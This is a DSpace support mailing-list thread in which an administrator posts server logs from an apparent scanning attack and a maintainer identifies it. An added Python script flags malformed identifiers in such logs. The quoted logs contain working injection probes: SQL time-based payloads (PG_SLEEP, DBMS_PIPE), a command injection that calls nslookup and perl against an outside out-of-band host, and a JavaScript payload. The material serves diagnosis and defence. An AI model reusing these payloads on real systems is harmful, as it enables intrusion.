Support


Nicolas Battaglia

Oct 12, 2022, 4:31:34 PM
to DSpace Technical Support
Hello everybody

I have a problem with my DSpace 7.2 PROD server.

Today the Angular client stopped working; after restarting it, it works for a few minutes and then stops.

In the nodejs console I found messages similar to these:

GET /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 404 995.928 ms - -
GET /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e 404 1129.742 ms - -
GET /communities/2'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98),15)%7C%7C'a8a3d54-61f6-4663-a293-d7fe02058c76 200 800.296 ms - -
Environment: Production
GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -
Environment: Production
Environment: Production
GET /communities/f824abaf-%7C(nslookup%20hitlerkvauufubbfc3.bxss.me%7C%7Cperl%20-e%20%22gethostbyname('hitlerkvauufubbfc3.bxss.me')%22)a85-459f-a087-e521fd3f486f 200 1215.078 ms - -

And, in my dspace.log file, some messages like this:

022-10-12 03:51:55,017 ERROR unknown 70ae76ad-f77a-44f3-8932-58586342dc12 org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::Error in Discovery while setting up date facet range:date facet\colon; org.dspace.discovery.configuration.DiscoverySearchFilterFacet@20f3548b
org.dspace.discovery.SearchServiceException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
Was expecting one of:
    "]" ...
    "}" ...
   
at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:726) ~[dspace-api-7.1.1.jar:7.1.1]

Caused by: org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
Was expecting one of:
    "]" ...
    "}" ...

By the way, today's DSpace log file is 200 MB (on other days it is about 4 MB).

Any ideas?

Thanks



Tim Donohue

Oct 13, 2022, 12:20:08 PM
to Nicolas Battaglia, DSpace Technical Support
Hi Nicolas,

Those logs make it look like someone is attempting to hack into your system or find a vulnerability by generating random URLs.

Those "GET /communities/" paths you shared appear to have embedded SQL commands and embedded JavaScript. So, they look to be trying to determine if there's a way to execute those commands against your system. DSpace itself will never access or use URLs of those types.

My recommendation would be to see if you can block the IP address which is sending those commands. While none of those commands should do anything in DSpace 7, they are obviously up to no good & trying to find a way to hack your system.

Overall, I don't see any bugs here in DSpace's behavior based on anything you've shared.

Tim

From: dspac...@googlegroups.com <dspac...@googlegroups.com> on behalf of Nicolas Battaglia <ing.nicola...@gmail.com>
Sent: Wednesday, October 12, 2022 3:31 PM
To: DSpace Technical Support <dspac...@googlegroups.com>
Subject: [dspace-tech] Support
 

Nicolas Battaglia

Oct 13, 2022, 2:15:39 PM
to Tim Donohue, DSpace Technical Support
Hello Tim, I solved the problem with an IP filter. My concern was that the Angular client stopped working with something more than 10 requests per second. Analyzing the REST API log, I identified that each request started to take up to 10 seconds. Then I restarted the application service (nodejs) and it was working again for a few seconds.
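
A triage check for the access-log lines quoted in the first post, as an added example that is not part of the thread or of DSpace: it flags requests whose object identifier is not a well-formed UUID, regardless of status code, since two of the posted probes returned 200. The function names and the `collections`/`items` routes are assumptions; `communities` and the log line format come from the post.

```python
import re
from urllib.parse import unquote

# Request line format as printed in the Node.js console in the first post:
#   GET <path> <status> <time> ms - <length>
LINE_RE = re.compile(r"^([A-Z]+) (\S+) (\d{3}) ([\d.]+) ms\b")
UUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
# "communities" is from the thread; the other two routes are assumptions.
UUID_ROUTES = {"communities", "collections", "items"}


def check_line(line):
    """Return a dict for a request whose object id is not a UUID, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # e.g. "Environment: Production" noise between requests
    _method, raw_path, status, ms = m.groups()
    parts = raw_path.split("?", 1)[0].lstrip("/").split("/")
    if len(parts) < 2 or parts[0] not in UUID_ROUTES:
        return None
    # Decode after splitting so an encoded "/" stays inside the id segment.
    ident = unquote(parts[1])
    # fullmatch (not match with "$") so a decoded trailing newline is rejected.
    if UUID_RE.fullmatch(ident):
        return None
    return {"route": parts[0], "id": ident,
            "status": int(status), "ms": float(ms)}


def scan(lines):
    """Return the flagged requests found in an iterable of console lines."""
    return [hit for hit in map(check_line, lines) if hit]


SAMPLE = [
    # The first three lines are copied from the post; the last two are constructed.
    "GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -",
    "Environment: Production",
    "GET /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 404 995.928 ms - -",
    "GET /communities/0f1e2d3c-4b5a-4978-8a6b-5c4d3e2f1a0b 200 412.300 ms - -",
    "GET /home 200 120.000 ms - -",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit["status"], hit["ms"], repr(hit["id"]))
```

Lines in this format carry no client address, so flagged paths have to be matched against a proxy or REST API log that records it before an IP filter can be written.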